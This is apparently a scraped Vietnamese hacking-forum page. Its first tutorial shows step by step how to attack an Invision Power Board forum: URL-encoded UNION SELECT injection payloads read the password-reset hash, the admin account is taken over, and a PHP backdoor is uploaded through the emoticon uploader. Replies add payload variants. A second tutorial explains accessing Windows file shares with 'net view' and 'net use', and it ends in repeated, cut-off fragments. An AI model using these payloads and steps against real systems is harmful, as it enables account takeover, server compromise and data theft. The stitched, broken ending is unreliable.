ok Link của nó có dạng: Trích: http ://www.XXXXXindex.php?act=Reg&CODE=lostpassform&uid=1 &aid=1b3f179f8e33ddd90a601f7e0f0919c1 sẽ xuất hiện Activation Form và 1b3f179f8e33ddd90a601f7e0f0919c1 chính là pass để Set pass mới ! và quan trọng là khi mà mình Forgot Pass thì DATBASE sẽ tạo ra một pass mới cho Victim và nó sẽ tạm thời lưu trong table ibf_validating ! và nó nằm trong column password ! ok! bây giờ nếu muốn hiẻu đựoc rõ hơn! thì bạn nên đoc kỹ bài viết về tư duy! kỹ thuật khai thác SQL trong Forum tại đây: https://www.vniss.net/xforce/showthread.php?t=400 cho thật kỹ thì sẽ hiểu vì sao tôi chỉ Select có mỗi column password trong table ibf_validating thôi! ok! bây giờ câu lệnh để lấy cái pass được mã hóa Md5 ! dùng cho việc Set lại Pass mới là: Trích: %20UNION%20SELECT%20v.vid%20FROM%20ibf_validating% 20v%2cibf_topics%20t%20WHERE%20v.member_id=1 vậy link của nó là: http://nubcake.com/index.php?act=Arcade&module=report&user=- 1%20%20UNION%20SELECT%20v.vid%20FROM%20ibf_validat ing%20v%2cibf_topics%20t%20WHERE%20v.member_id=1 sẽ thấy : đó chính là phần pass để Reset Pass mới! sau đó bạn vào phần sau : Trích: http ://www.XXXXXindex.php?act=Reg&CODE=lostpassform&uid=1 &aid=1b3f179f8e33ddd90a601f7e0f0919c1 thay phần bôi đó này bằng cái Pass reset mới hack đựoc đó! ok: lúc nào thấy xuất hiện Form sau: thì nhập Pass mới mà bạn muốn sử dụng vào : ví dụ Vniss (nhập 2 cái giống nhau nhé !OK) sau đó thì đơn giản! chỉ việc Login vào forum! và sau đó bạn vào ACP (cái này nếu mà Forum dùng Pass Sec thì sẽ khó khăn hớn nếu dạng pass Sec mà nằm trong Data thì sử dụng câu lệnh Selec mà tìm ra cái pass Sec đó ! còn nếu dạng pass defaul thì khó khăn đấy! Pass Defaul là dạng Admin Site đó tự mã hóa một cái pass và sau đó paste vào trong Code file admin.php , như thế thì chỉ còn cách hack Local mới biết được pass Sec đó thôi! hiiiii) còn cái này thì không có pass Sec! sướng quá! ok! vào http://nubcake.com/admin.php Login vào! và sau đó chọn phần Manage Emoticon nhấp chuột vào đó! và chọn phần upload Emoticon! ok! vì thằng ÌBP không Fix phần upload Emoticon là chỉ có IMAGE nên ta có thể uplaod lên dây 1 file php! và bạn hãy upload lên 1 con backdoor! ok! link của nó sau khi upload sẽ là: http://nubcake.com/html/emoticons/xxx.php ok! Run lên! là bạn sẽ có 1 backdoor trên hosting rồi đó! nói thêm về cách upload backdoor trong ACP thì các bạn có thể upload qua XML nữa! cái này làm sao upload đựoc thì các bạn hãy tự nghiên cứu xem sao nhé! nó cũng khá là dễ! hiiiiiii đơn giản lắm! các phiên bản về sau này thì càng có nhiều nới upload backdoor trong ACP! hãy tìm hiểu đi!ok! Lời khuyên cho các quản trị: _ Khi làm một Mod Game hay thứ nào đó hãy kiểm tra code trứoc! check xem có bug ko! _nên xây dựng thêm Pass Sec Login vào ACP để Forum an toàn hơn! _Chmod thật kỹ các thư mục : UPLOADS ! thư mục EMOTICON ! và các thư mục có khả năng cho upload khác nữa! _ hạn chế việc cho phép các MEM, User upload file lên hosting! thỉnh thoảng vào các Site bảo mật! hacking để cập nhật các Infor về lỗi bảo mật và thông tin liên quan! trungthep(VNISS) tut anh trungthep luôn tỉ mỉ và đầy đủ rek xin nói thêm 1 ít Code: đoạn này %20UNION%20SELECT%20v.vid%20FROM%20ibf_validating% 20v%2cibf_topics%20t%20WHERE%20v.member_id=1 có thể chuyển thành %20UNION%20SELECT%20v.vid%20FROM%20ibf_validating%20WHERE%2 0v.member_id=1 cho đơn giản, hash sẽ show ở "total games played by" Code: với IPB 2.0.x vào index.php?showuser=1 để xem Username trc khi ForgotPass với 2.1.x vào ngoài ra ở IPB 2.1.x sẽ có display name nên ta phải inject %20UNION%20SELECT%20name%20FROM%20ibf_members%20WHERE%2 0id=1 Rekcor(VNISS) Hacking PC resource share - Hướng đi và giải pháp Tác giả: ZENO-HVAOnline Bài viết này với mục đích chia sẻ,học hỏi,trao đổi kiến thức! Nội dung của bài viết là hack vào PC sử dụng HĐH windows và các phương pháp phòng chống (trong phạm vi kiến thức của tui thôi nha). Bây giờ chúng ta cùng bắt đầu suy nghĩ những hướng phải đi. Khi bạn Online ( tức kết nối vào Internet) bạn sẽ được ISP gán cho một IP nào đó. Vậy Hacker có biết được IP của bạn không? Câu trả lời là có ( nếu Hacker giao tiếp với bạn,có nghĩa là máy của bạn và máy của hacker có sự kết nối, đồng nghĩa với việc trao đổi các packet,từ các packet có thể biết được địa chi IP nguồn) Khi biết IP của bạn liệu hacker có thể hack vào máy tính của bạn không? Câu trả lời là hoàn toàn có thể. Vậy hacker làm như thế nào để Hack? Hacking thông qua resource share: Hacker có thể dùng các tool hack tự động ví dụ như : ent3,legion… ( nhưng bản chất của các công cụ này là thưc hiện các bước mà tôi sẽ nói dưới đây 1 cách tự động,chính vì vậy việc dùng các tool này là một cách khá củ chuối …) Trước tiên Hacker sẽ kiểm tra nhưng tài nguyên được chia sẻ trên máy tính của bạn. Chỉ bằng vài dòng lệnh đơn giản trên comand line: CODE [C:\>Net view \\x.x.x.x ( với x.x.x.x là địa chỉ IP của bạn mà hacker đã biết ) Shared resources at \\x.x.x.x Share name Type Used as Comment C Disk PRJA3 Disk The command completed successfully. C:\> Với Windows 95 & 98 thì khả năng bị hack Cao hơn nhiều so với Windows NT,2000,XP ( vì win 95,98 dùng định dạng FAT&FAT32 có độ bảo mật thấp hơn nhiều so với NTFS) Đối với hai loại Windows này (95,98) Hacker thậm chí không cần lấy Administrator cũng có thể làm được tất cả ( bạn có tin không ?). Khuyến cáo : không nên dùng 2 loại win này vì quá lỗi thời và có thể bị hack bất cứ lúc nào. Sau khi liệt kê các Ổ đĩa,folder share bước tiếp theo của hacker là phải truy cập vào các ổ đĩa,folder đó để lấy dữ liệu (đây cũng là mục đích của hacker).Hacker sẽ ánh sạ ổ đĩa ,thư mục share để truy cập vào. Cũng bằng command line: CODE C:\> net use z: \\x.x.x.x \share The command completed successfully . được ISP gán cho một IP nào đó. Vậy Hacker có biết được IP của bạn không? Câu trả lời là có ( nếu Hacker giao tiếp với bạn,có nghĩa là máy của bạn và máy của hacker có sự kết nối, đồng nghĩa với. IP của bạn liệu hacker có thể hack vào máy tính của bạn không? Câu trả lời là hoàn toàn có thể. Vậy hacker làm như thế nào để Hack? Hacking thông qua resource share: Hacker có thể dùng. liệt kê các Ổ đĩa,folder share bước tiếp theo của hacker là phải truy cập vào các ổ đĩa,folder đó để lấy dữ liệu (đây cũng là mục đích của hacker) .Hacker sẽ ánh sạ ổ đĩa ,thư mục share để truy